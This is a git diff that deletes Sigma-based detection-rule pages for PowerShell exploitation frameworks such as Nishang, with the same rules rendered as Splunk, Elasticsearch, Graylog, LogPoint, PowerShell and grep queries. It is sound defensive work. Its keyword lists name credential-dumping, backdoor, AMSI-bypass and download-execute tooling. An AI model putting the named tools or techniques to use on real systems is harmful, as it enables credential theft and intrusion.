-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f62176f3-8128-4faa-bf6c-83261322e5eb <<EOF
-{
-  "metadata": {
-    "title": "Malicious PowerShell Keywords",
-    "description": "Detects keywords from well-known PowerShell exploitation frameworks",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "Message.keyword:(*AdjustTokenPrivileges* OR *IMAGE_NT_OPTIONAL_HDR64_MAGIC* OR *Microsoft.Win32.UnsafeNativeMethods* OR *ReadProcessMemory.Invoke* OR *SE_PRIVILEGE_ENABLED* OR *LSA_UNICODE_STRING* OR *MiniDumpWriteDump* OR *PAGE_EXECUTE_READ* OR *SECURITY_DELEGATION* OR *TOKEN_ADJUST_PRIVILEGES* OR *TOKEN_ALL_ACCESS* OR *TOKEN_ASSIGN_PRIMARY* OR *TOKEN_DUPLICATE* OR *TOKEN_ELEVATION* OR *TOKEN_IMPERSONATE* OR *TOKEN_INFORMATION_CLASS* OR *TOKEN_PRIVILEGES* OR *TOKEN_QUERY* OR *Metasploit* OR *Mimikatz*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "Message.keyword:(*AdjustTokenPrivileges* OR *IMAGE_NT_OPTIONAL_HDR64_MAGIC* OR *Microsoft.Win32.UnsafeNativeMethods* OR *ReadProcessMemory.Invoke* OR *SE_PRIVILEGE_ENABLED* OR *LSA_UNICODE_STRING* OR *MiniDumpWriteDump* OR *PAGE_EXECUTE_READ* OR *SECURITY_DELEGATION* OR *TOKEN_ADJUST_PRIVILEGES* OR *TOKEN_ALL_ACCESS* OR *TOKEN_ASSIGN_PRIMARY* OR *TOKEN_DUPLICATE* OR *TOKEN_ELEVATION* OR *TOKEN_IMPERSONATE* OR *TOKEN_INFORMATION_CLASS* OR *TOKEN_PRIVILEGES* OR *TOKEN_QUERY* OR *Metasploit* OR *Mimikatz*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Malicious PowerShell Keywords'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Message.keyword:(*AdjustTokenPrivileges* *IMAGE_NT_OPTIONAL_HDR64_MAGIC* *Microsoft.Win32.UnsafeNativeMethods* *ReadProcessMemory.Invoke* *SE_PRIVILEGE_ENABLED* *LSA_UNICODE_STRING* *MiniDumpWriteDump* *PAGE_EXECUTE_READ* *SECURITY_DELEGATION* *TOKEN_ADJUST_PRIVILEGES* *TOKEN_ALL_ACCESS* *TOKEN_ASSIGN_PRIMARY* *TOKEN_DUPLICATE* *TOKEN_ELEVATION* *TOKEN_IMPERSONATE* *TOKEN_INFORMATION_CLASS* *TOKEN_PRIVILEGES* *TOKEN_QUERY* *Metasploit* *Mimikatz*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" (Message="*AdjustTokenPrivileges*" OR Message="*IMAGE_NT_OPTIONAL_HDR64_MAGIC*" OR Message="*Microsoft.Win32.UnsafeNativeMethods*" OR Message="*ReadProcessMemory.Invoke*" OR Message="*SE_PRIVILEGE_ENABLED*" OR Message="*LSA_UNICODE_STRING*" OR Message="*MiniDumpWriteDump*" OR Message="*PAGE_EXECUTE_READ*" OR Message="*SECURITY_DELEGATION*" OR Message="*TOKEN_ADJUST_PRIVILEGES*" OR Message="*TOKEN_ALL_ACCESS*" OR Message="*TOKEN_ASSIGN_PRIMARY*" OR Message="*TOKEN_DUPLICATE*" OR Message="*TOKEN_ELEVATION*" OR Message="*TOKEN_IMPERSONATE*" OR Message="*TOKEN_INFORMATION_CLASS*" OR Message="*TOKEN_PRIVILEGES*" OR Message="*TOKEN_QUERY*" OR Message="*Metasploit*" OR Message="*Mimikatz*"))
-```
-
-
-### logpoint
-    
-```
-Message IN ["*AdjustTokenPrivileges*", "*IMAGE_NT_OPTIONAL_HDR64_MAGIC*", "*Microsoft.Win32.UnsafeNativeMethods*", "*ReadProcessMemory.Invoke*", "*SE_PRIVILEGE_ENABLED*", "*LSA_UNICODE_STRING*", "*MiniDumpWriteDump*", "*PAGE_EXECUTE_READ*", "*SECURITY_DELEGATION*", "*TOKEN_ADJUST_PRIVILEGES*", "*TOKEN_ALL_ACCESS*", "*TOKEN_ASSIGN_PRIMARY*", "*TOKEN_DUPLICATE*", "*TOKEN_ELEVATION*", "*TOKEN_IMPERSONATE*", "*TOKEN_INFORMATION_CLASS*", "*TOKEN_PRIVILEGES*", "*TOKEN_QUERY*", "*Metasploit*", "*Mimikatz*"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*AdjustTokenPrivileges.*|.*.*IMAGE_NT_OPTIONAL_HDR64_MAGIC.*|.*.*Microsoft\.Win32\.UnsafeNativeMethods.*|.*.*ReadProcessMemory\.Invoke.*|.*.*SE_PRIVILEGE_ENABLED.*|.*.*LSA_UNICODE_STRING.*|.*.*MiniDumpWriteDump.*|.*.*PAGE_EXECUTE_READ.*|.*.*SECURITY_DELEGATION.*|.*.*TOKEN_ADJUST_PRIVILEGES.*|.*.*TOKEN_ALL_ACCESS.*|.*.*TOKEN_ASSIGN_PRIMARY.*|.*.*TOKEN_DUPLICATE.*|.*.*TOKEN_ELEVATION.*|.*.*TOKEN_IMPERSONATE.*|.*.*TOKEN_INFORMATION_CLASS.*|.*.*TOKEN_PRIVILEGES.*|.*.*TOKEN_QUERY.*|.*.*Metasploit.*|.*.*Mimikatz.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_nishang_malicious_commandlets.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_nishang_malicious_commandlets.md
deleted file mode 100644
index a30c64f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_nishang_malicious_commandlets.md
+++ /dev/null
@@ -1,248 +0,0 @@
-| Title                    | Malicious Nishang PowerShell Commandlets       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Commandlet names and arguments from the Nishang exploitation framework |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0036_4104_windows_powershell_script_block](../Data_Needed/DN0036_4104_windows_powershell_script_block.md)</li><li>[DN0037_4103_windows_powershell_executing_pipeline](../Data_Needed/DN0037_4103_windows_powershell_executing_pipeline.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Penetration testing</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)</li></ul>  |
-| **Author**               | Alec Costello |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Malicious Nishang PowerShell Commandlets
-id: f772cee9-b7c2-4cb2-8f07-49870adc02e0
-status: experimental
-description: Detects Commandlet names and arguments from the Nishang exploitation framework
-date: 2019/05/16
-references:
-    - https://github.com/samratashok/nishang
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Alec Costello
-logsource:
-    product: windows
-    service: powershell
-    definition: It is recommanded to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277
-detection:
-    keywords:
-        - Add-ConstrainedDelegationBackdoor
-        - Set-DCShadowPermissions
-        - DNS_TXT_Pwnage
-        - Execute-OnTime
-        - HTTP-Backdoor
-        - Set-RemotePSRemoting
-        - Set-RemoteWMI
-        - Invoke-AmsiBypass
-        - Out-CHM
-        - Out-HTA
-        - Out-SCF
-        - Out-SCT
-        - Out-Shortcut
-        - Out-WebQuery
-        - Out-Word
-        - Enable-Duplication
-        - Remove-Update
-        - Download-Execute-PS
-        - Download_Execute
-        - Execute-Command-MSSQL
-        - Execute-DNSTXT-Code
-        - Out-RundllCommand
-        - Copy-VSS
-        - FireBuster
-        - FireListener
-        - Get-Information
-        - Get-PassHints
-        - Get-WLAN-Keys
-        - Get-Web-Credentials
-        - Invoke-CredentialsPhish
-        - Invoke-MimikatzWDigestDowngrade
-        - Invoke-SSIDExfil
-        - Invoke-SessionGopher
-        - Keylogger
-        - Invoke-Interceptor
-        - Create-MultipleSessions
-        - Invoke-NetworkRelay
-        - Run-EXEonRemote
-        - Invoke-Prasadhak
-        - Invoke-BruteForce
-        - Password-List
-        - Invoke-JSRatRegsvr
-        - Invoke-JSRatRundll
-        - Invoke-PoshRatHttps
-        - Invoke-PowerShellIcmp
-        - Invoke-PowerShellUdp
-        - Invoke-PSGcat
-        - Invoke-PsGcatAgent
-        - Remove-PoshRat
-        - Add-Persistance
-        - ExetoText
-        - Invoke-Decode
-        - Invoke-Encode
-        - Parse_Keys
-        - Remove-Persistence
-        - StringtoBase64
-        - TexttoExe
-        - Powerpreter
-        - Nishang
-        - EncodedData
-        - DataToEncode
-        - LoggedKeys
-        - OUT-DNSTXT
-        - Jitter
-        - ExfilOption
-        - Tamper
-        - DumpCerts
-        - DumpCreds
-        - Shellcode32
-        - Shellcode64
-        - NotAllNameSpaces
-        - exfill
-        - FakeDC
-        - Exploit
-    condition: keywords
-falsepositives:
-    - Penetration testing
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {(($_.message -match "Add-ConstrainedDelegationBackdoor" -or $_.message -match "Set-DCShadowPermissions" -or $_.message -match "DNS_TXT_Pwnage" -or $_.message -match "Execute-OnTime" -or $_.message -match "HTTP-Backdoor" -or $_.message -match "Set-RemotePSRemoting" -or $_.message -match "Set-RemoteWMI" -or $_.message -match "Invoke-AmsiBypass" -or $_.message -match "Out-CHM" -or $_.message -match "Out-HTA" -or $_.message -match "Out-SCF" -or $_.message -match "Out-SCT" -or $_.message -match "Out-Shortcut" -or $_.message -match "Out-WebQuery" -or $_.message -match "Out-Word" -or $_.message -match "Enable-Duplication" -or $_.message -match "Remove-Update" -or $_.message -match "Download-Execute-PS" -or $_.message -match "Download_Execute" -or $_.message -match "Execute-Command-MSSQL" -or $_.message -match "Execute-DNSTXT-Code" -or $_.message -match "Out-RundllCommand" -or $_.message -match "Copy-VSS" -or $_.message -match "FireBuster" -or $_.message -match "FireListener" -or $_.message -match "Get-Information" -or $_.message -match "Get-PassHints" -or $_.message -match "Get-WLAN-Keys" -or $_.message -match "Get-Web-Credentials" -or $_.message -match "Invoke-CredentialsPhish" -or $_.message -match "Invoke-MimikatzWDigestDowngrade" -or $_.message -match "Invoke-SSIDExfil" -or $_.message -match "Invoke-SessionGopher" -or $_.message -match "Keylogger" -or $_.message -match "Invoke-Interceptor" -or $_.message -match "Create-MultipleSessions" -or $_.message -match "Invoke-NetworkRelay" -or $_.message -match "Run-EXEonRemote" -or $_.message -match "Invoke-Prasadhak" -or $_.message -match "Invoke-BruteForce" -or $_.message -match "Password-List" -or $_.message -match "Invoke-JSRatRegsvr" -or $_.message -match "Invoke-JSRatRundll" -or $_.message -match "Invoke-PoshRatHttps" -or $_.message -match "Invoke-PowerShellIcmp" -or $_.message -match "Invoke-PowerShellUdp" -or $_.message -match "Invoke-PSGcat" -or $_.message -match "Invoke-PsGcatAgent" -or $_.message -match "Remove-PoshRat" -or $_.message -match "Add-Persistance" -or $_.message -match "ExetoText" -or $_.message -match "Invoke-Decode" -or $_.message -match "Invoke-Encode" -or $_.message -match "Parse_Keys" -or $_.message -match "Remove-Persistence" -or $_.message -match "StringtoBase64" -or $_.message -match "TexttoExe" -or $_.message -match "Powerpreter" -or $_.message -match "Nishang" -or $_.message -match "EncodedData" -or $_.message -match "DataToEncode" -or $_.message -match "LoggedKeys" -or $_.message -match "OUT-DNSTXT" -or $_.message -match "Jitter" -or $_.message -match "ExfilOption" -or $_.message -match "Tamper" -or $_.message -match "DumpCerts" -or $_.message -match "DumpCreds" -or $_.message -match "Shellcode32" -or $_.message -match "Shellcode64" -or $_.message -match "NotAllNameSpaces" -or $_.message -match "exfill" -or $_.message -match "FakeDC" -or $_.message -match "Exploit")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-\*.keyword:(*Add\-ConstrainedDelegationBackdoor* OR *Set\-DCShadowPermissions* OR *DNS_TXT_Pwnage* OR *Execute\-OnTime* OR *HTTP\-Backdoor* OR *Set\-RemotePSRemoting* OR *Set\-RemoteWMI* OR *Invoke\-AmsiBypass* OR *Out\-CHM* OR *Out\-HTA* OR *Out\-SCF* OR *Out\-SCT* OR *Out\-Shortcut* OR *Out\-WebQuery* OR *Out\-Word* OR *Enable\-Duplication* OR *Remove\-Update* OR *Download\-Execute\-PS* OR *Download_Execute* OR *Execute\-Command\-MSSQL* OR *Execute\-DNSTXT\-Code* OR *Out\-RundllCommand* OR *Copy\-VSS* OR *FireBuster* OR *FireListener* OR *Get\-Information* OR *Get\-PassHints* OR *Get\-WLAN\-Keys* OR *Get\-Web\-Credentials* OR *Invoke\-CredentialsPhish* OR *Invoke\-MimikatzWDigestDowngrade* OR *Invoke\-SSIDExfil* OR *Invoke\-SessionGopher* OR *Keylogger* OR *Invoke\-Interceptor* OR *Create\-MultipleSessions* OR *Invoke\-NetworkRelay* OR *Run\-EXEonRemote* OR *Invoke\-Prasadhak* OR *Invoke\-BruteForce* OR *Password\-List* OR *Invoke\-JSRatRegsvr* OR *Invoke\-JSRatRundll* OR *Invoke\-PoshRatHttps* OR *Invoke\-PowerShellIcmp* OR *Invoke\-PowerShellUdp* OR *Invoke\-PSGcat* OR *Invoke\-PsGcatAgent* OR *Remove\-PoshRat* OR *Add\-Persistance* OR *ExetoText* OR *Invoke\-Decode* OR *Invoke\-Encode* OR *Parse_Keys* OR *Remove\-Persistence* OR *StringtoBase64* OR *TexttoExe* OR *Powerpreter* OR *Nishang* OR *EncodedData* OR *DataToEncode* OR *LoggedKeys* OR *OUT\-DNSTXT* OR *Jitter* OR *ExfilOption* OR *Tamper* OR *DumpCerts* OR *DumpCreds* OR *Shellcode32* OR *Shellcode64* OR *NotAllNameSpaces* OR *exfill* OR *FakeDC* OR *Exploit*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f772cee9-b7c2-4cb2-8f07-49870adc02e0 <<EOF
-{
-  "metadata": {
-    "title": "Malicious Nishang PowerShell Commandlets",
-    "description": "Detects Commandlet names and arguments from the Nishang exploitation framework",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "\\*.keyword:(*Add\\-ConstrainedDelegationBackdoor* OR *Set\\-DCShadowPermissions* OR *DNS_TXT_Pwnage* OR *Execute\\-OnTime* OR *HTTP\\-Backdoor* OR *Set\\-RemotePSRemoting* OR *Set\\-RemoteWMI* OR *Invoke\\-AmsiBypass* OR *Out\\-CHM* OR *Out\\-HTA* OR *Out\\-SCF* OR *Out\\-SCT* OR *Out\\-Shortcut* OR *Out\\-WebQuery* OR *Out\\-Word* OR *Enable\\-Duplication* OR *Remove\\-Update* OR *Download\\-Execute\\-PS* OR *Download_Execute* OR *Execute\\-Command\\-MSSQL* OR *Execute\\-DNSTXT\\-Code* OR *Out\\-RundllCommand* OR *Copy\\-VSS* OR *FireBuster* OR *FireListener* OR *Get\\-Information* OR *Get\\-PassHints* OR *Get\\-WLAN\\-Keys* OR *Get\\-Web\\-Credentials* OR *Invoke\\-CredentialsPhish* OR *Invoke\\-MimikatzWDigestDowngrade* OR *Invoke\\-SSIDExfil* OR *Invoke\\-SessionGopher* OR *Keylogger* OR *Invoke\\-Interceptor* OR *Create\\-MultipleSessions* OR *Invoke\\-NetworkRelay* OR *Run\\-EXEonRemote* OR *Invoke\\-Prasadhak* OR *Invoke\\-BruteForce* OR *Password\\-List* OR *Invoke\\-JSRatRegsvr* OR *Invoke\\-JSRatRundll* OR *Invoke\\-PoshRatHttps* OR *Invoke\\-PowerShellIcmp* OR *Invoke\\-PowerShellUdp* OR *Invoke\\-PSGcat* OR *Invoke\\-PsGcatAgent* OR *Remove\\-PoshRat* OR *Add\\-Persistance* OR *ExetoText* OR *Invoke\\-Decode* OR *Invoke\\-Encode* OR *Parse_Keys* OR *Remove\\-Persistence* OR *StringtoBase64* OR *TexttoExe* OR *Powerpreter* OR *Nishang* OR *EncodedData* OR *DataToEncode* OR *LoggedKeys* OR *OUT\\-DNSTXT* OR *Jitter* OR *ExfilOption* OR *Tamper* OR *DumpCerts* OR *DumpCreds* OR *Shellcode32* OR *Shellcode64* OR *NotAllNameSpaces* OR *exfill* OR *FakeDC* OR *Exploit*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "\\*.keyword:(*Add\\-ConstrainedDelegationBackdoor* OR *Set\\-DCShadowPermissions* OR *DNS_TXT_Pwnage* OR *Execute\\-OnTime* OR *HTTP\\-Backdoor* OR *Set\\-RemotePSRemoting* OR *Set\\-RemoteWMI* OR *Invoke\\-AmsiBypass* OR *Out\\-CHM* OR *Out\\-HTA* OR *Out\\-SCF* OR *Out\\-SCT* OR *Out\\-Shortcut* OR *Out\\-WebQuery* OR *Out\\-Word* OR *Enable\\-Duplication* OR *Remove\\-Update* OR *Download\\-Execute\\-PS* OR *Download_Execute* OR *Execute\\-Command\\-MSSQL* OR *Execute\\-DNSTXT\\-Code* OR *Out\\-RundllCommand* OR *Copy\\-VSS* OR *FireBuster* OR *FireListener* OR *Get\\-Information* OR *Get\\-PassHints* OR *Get\\-WLAN\\-Keys* OR *Get\\-Web\\-Credentials* OR *Invoke\\-CredentialsPhish* OR *Invoke\\-MimikatzWDigestDowngrade* OR *Invoke\\-SSIDExfil* OR *Invoke\\-SessionGopher* OR *Keylogger* OR *Invoke\\-Interceptor* OR *Create\\-MultipleSessions* OR *Invoke\\-NetworkRelay* OR *Run\\-EXEonRemote* OR *Invoke\\-Prasadhak* OR *Invoke\\-BruteForce* OR *Password\\-List* OR *Invoke\\-JSRatRegsvr* OR *Invoke\\-JSRatRundll* OR *Invoke\\-PoshRatHttps* OR *Invoke\\-PowerShellIcmp* OR *Invoke\\-PowerShellUdp* OR *Invoke\\-PSGcat* OR *Invoke\\-PsGcatAgent* OR *Remove\\-PoshRat* OR *Add\\-Persistance* OR *ExetoText* OR *Invoke\\-Decode* OR *Invoke\\-Encode* OR *Parse_Keys* OR *Remove\\-Persistence* OR *StringtoBase64* OR *TexttoExe* OR *Powerpreter* OR *Nishang* OR *EncodedData* OR *DataToEncode* OR *LoggedKeys* OR *OUT\\-DNSTXT* OR *Jitter* OR *ExfilOption* OR *Tamper* OR *DumpCerts* OR *DumpCreds* OR *Shellcode32* OR *Shellcode64* OR *NotAllNameSpaces* OR *exfill* OR *FakeDC* OR *Exploit*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Malicious Nishang PowerShell Commandlets'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-\*.keyword:(*Add\-ConstrainedDelegationBackdoor* OR *Set\-DCShadowPermissions* OR *DNS_TXT_Pwnage* OR *Execute\-OnTime* OR *HTTP\-Backdoor* OR *Set\-RemotePSRemoting* OR *Set\-RemoteWMI* OR *Invoke\-AmsiBypass* OR *Out\-CHM* OR *Out\-HTA* OR *Out\-SCF* OR *Out\-SCT* OR *Out\-Shortcut* OR *Out\-WebQuery* OR *Out\-Word* OR *Enable\-Duplication* OR *Remove\-Update* OR *Download\-Execute\-PS* OR *Download_Execute* OR *Execute\-Command\-MSSQL* OR *Execute\-DNSTXT\-Code* OR *Out\-RundllCommand* OR *Copy\-VSS* OR *FireBuster* OR *FireListener* OR *Get\-Information* OR *Get\-PassHints* OR *Get\-WLAN\-Keys* OR *Get\-Web\-Credentials* OR *Invoke\-CredentialsPhish* OR *Invoke\-MimikatzWDigestDowngrade* OR *Invoke\-SSIDExfil* OR *Invoke\-SessionGopher* OR *Keylogger* OR *Invoke\-Interceptor* OR *Create\-MultipleSessions* OR *Invoke\-NetworkRelay* OR *Run\-EXEonRemote* OR *Invoke\-Prasadhak* OR *Invoke\-BruteForce* OR *Password\-List* OR *Invoke\-JSRatRegsvr* OR *Invoke\-JSRatRundll* OR *Invoke\-PoshRatHttps* OR *Invoke\-PowerShellIcmp* OR *Invoke\-PowerShellUdp* OR *Invoke\-PSGcat* OR *Invoke\-PsGcatAgent* OR *Remove\-PoshRat* OR *Add\-Persistance* OR *ExetoText* OR *Invoke\-Decode* OR *Invoke\-Encode* OR *Parse_Keys* OR *Remove\-Persistence* OR *StringtoBase64* OR *TexttoExe* OR *Powerpreter* OR *Nishang* OR *EncodedData* OR *DataToEncode* OR *LoggedKeys* OR *OUT\-DNSTXT* OR *Jitter* OR *ExfilOption* OR *Tamper* OR *DumpCerts* OR *DumpCreds* OR *Shellcode32* OR *Shellcode64* OR *NotAllNameSpaces* OR *exfill* OR *FakeDC* OR *Exploit*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" ("Add-ConstrainedDelegationBackdoor" OR "Set-DCShadowPermissions" OR "DNS_TXT_Pwnage" OR "Execute-OnTime" OR "HTTP-Backdoor" OR "Set-RemotePSRemoting" OR "Set-RemoteWMI" OR "Invoke-AmsiBypass" OR "Out-CHM" OR "Out-HTA" OR "Out-SCF" OR "Out-SCT" OR "Out-Shortcut" OR "Out-WebQuery" OR "Out-Word" OR "Enable-Duplication" OR "Remove-Update" OR "Download-Execute-PS" OR "Download_Execute" OR "Execute-Command-MSSQL" OR "Execute-DNSTXT-Code" OR "Out-RundllCommand" OR "Copy-VSS" OR "FireBuster" OR "FireListener" OR "Get-Information" OR "Get-PassHints" OR "Get-WLAN-Keys" OR "Get-Web-Credentials" OR "Invoke-CredentialsPhish" OR "Invoke-MimikatzWDigestDowngrade" OR "Invoke-SSIDExfil" OR "Invoke-SessionGopher" OR "Keylogger" OR "Invoke-Interceptor" OR "Create-MultipleSessions" OR "Invoke-NetworkRelay" OR "Run-EXEonRemote" OR "Invoke-Prasadhak" OR "Invoke-BruteForce" OR "Password-List" OR "Invoke-JSRatRegsvr" OR "Invoke-JSRatRundll" OR "Invoke-PoshRatHttps" OR "Invoke-PowerShellIcmp" OR "Invoke-PowerShellUdp" OR "Invoke-PSGcat" OR "Invoke-PsGcatAgent" OR "Remove-PoshRat" OR "Add-Persistance" OR "ExetoText" OR "Invoke-Decode" OR "Invoke-Encode" OR "Parse_Keys" OR "Remove-Persistence" OR "StringtoBase64" OR "TexttoExe" OR "Powerpreter" OR "Nishang" OR "EncodedData" OR "DataToEncode" OR "LoggedKeys" OR "OUT-DNSTXT" OR "Jitter" OR "ExfilOption" OR "Tamper" OR "DumpCerts" OR "DumpCreds" OR "Shellcode32" OR "Shellcode64" OR "NotAllNameSpaces" OR "exfill" OR "FakeDC" OR "Exploit"))
-```
-
-
-### logpoint
-    
-```
-("Add-ConstrainedDelegationBackdoor" OR "Set-DCShadowPermissions" OR "DNS_TXT_Pwnage" OR "Execute-OnTime" OR "HTTP-Backdoor" OR "Set-RemotePSRemoting" OR "Set-RemoteWMI" OR "Invoke-AmsiBypass" OR "Out-CHM" OR "Out-HTA" OR "Out-SCF" OR "Out-SCT" OR "Out-Shortcut" OR "Out-WebQuery" OR "Out-Word" OR "Enable-Duplication" OR "Remove-Update" OR "Download-Execute-PS" OR "Download_Execute" OR "Execute-Command-MSSQL" OR "Execute-DNSTXT-Code" OR "Out-RundllCommand" OR "Copy-VSS" OR "FireBuster" OR "FireListener" OR "Get-Information" OR "Get-PassHints" OR "Get-WLAN-Keys" OR "Get-Web-Credentials" OR "Invoke-CredentialsPhish" OR "Invoke-MimikatzWDigestDowngrade" OR "Invoke-SSIDExfil" OR "Invoke-SessionGopher" OR "Keylogger" OR "Invoke-Interceptor" OR "Create-MultipleSessions" OR "Invoke-NetworkRelay" OR "Run-EXEonRemote" OR "Invoke-Prasadhak" OR "Invoke-BruteForce" OR "Password-List" OR "Invoke-JSRatRegsvr" OR "Invoke-JSRatRundll" OR "Invoke-PoshRatHttps" OR "Invoke-PowerShellIcmp" OR "Invoke-PowerShellUdp" OR "Invoke-PSGcat" OR "Invoke-PsGcatAgent" OR "Remove-PoshRat" OR "Add-Persistance" OR "ExetoText" OR "Invoke-Decode" OR "Invoke-Encode" OR "Parse_Keys" OR "Remove-Persistence" OR "StringtoBase64" OR "TexttoExe" OR "Powerpreter" OR "Nishang" OR "EncodedData" OR "DataToEncode" OR "LoggedKeys" OR "OUT-DNSTXT" OR "Jitter" OR "ExfilOption" OR "Tamper" OR "DumpCerts" OR "DumpCreds" OR "Shellcode32" OR "Shellcode64" OR "NotAllNameSpaces" OR "exfill" OR "FakeDC" OR "Exploit")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*Add-ConstrainedDelegationBackdoor|.*Set-DCShadowPermissions|.*DNS_TXT_Pwnage|.*Execute-OnTime|.*HTTP-Backdoor|.*Set-RemotePSRemoting|.*Set-RemoteWMI|.*Invoke-AmsiBypass|.*Out-CHM|.*Out-HTA|.*Out-SCF|.*Out-SCT|.*Out-Shortcut|.*Out-WebQuery|.*Out-Word|.*Enable-Duplication|.*Remove-Update|.*Download-Execute-PS|.*Download_Execute|.*Execute-Command-MSSQL|.*Execute-DNSTXT-Code|.*Out-RundllCommand|.*Copy-VSS|.*FireBuster|.*FireListener|.*Get-Information|.*Get-PassHints|.*Get-WLAN-Keys|.*Get-Web-Credentials|.*Invoke-CredentialsPhish|.*Invoke-MimikatzWDigestDowngrade|.*Invoke-SSIDExfil|.*Invoke-SessionGopher|.*Keylogger|.*Invoke-Interceptor|.*Create-MultipleSessions|.*Invoke-NetworkRelay|.*Run-EXEonRemote|.*Invoke-Prasadhak|.*Invoke-BruteForce|.*Password-List|.*Invoke-JSRatRegsvr|.*Invoke-JSRatRundll|.*Invoke-PoshRatHttps|.*Invoke-PowerShellIcmp|.*Invoke-PowerShellUdp|.*Invoke-PSGcat|.*Invoke-PsGcatAgent|.*Remove-PoshRat|.*Add-Persistance|.*ExetoText|.*Invoke-Decode|.*Invoke-Encode|.*Parse_Keys|.*Remove-Persistence|.*StringtoBase64|.*TexttoExe|.*Powerpreter|.*Nishang|.*EncodedData|.*DataToEncode|.*LoggedKeys|.*OUT-DNSTXT|.*Jitter|.*ExfilOption|.*Tamper|.*DumpCerts|.*DumpCreds|.*Shellcode32|.*Shellcode64|.*NotAllNameSpaces|.*exfill|.*FakeDC|.*Exploit))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_ntfs_ads_access.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_ntfs_ads_access.md
deleted file mode 100644
index 990b56d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_ntfs_ads_access.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | NTFS Alternate Data Stream       |
-|:-------------------------|:------------------|
-| **Description**          | Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1096: NTFS File Attributes](https://attack.mitre.org/techniques/T1096)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0036_4104_windows_powershell_script_block](../Data_Needed/DN0036_4104_windows_powershell_script_block.md)</li><li>[DN0037_4103_windows_powershell_executing_pipeline](../Data_Needed/DN0037_4103_windows_powershell_executing_pipeline.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
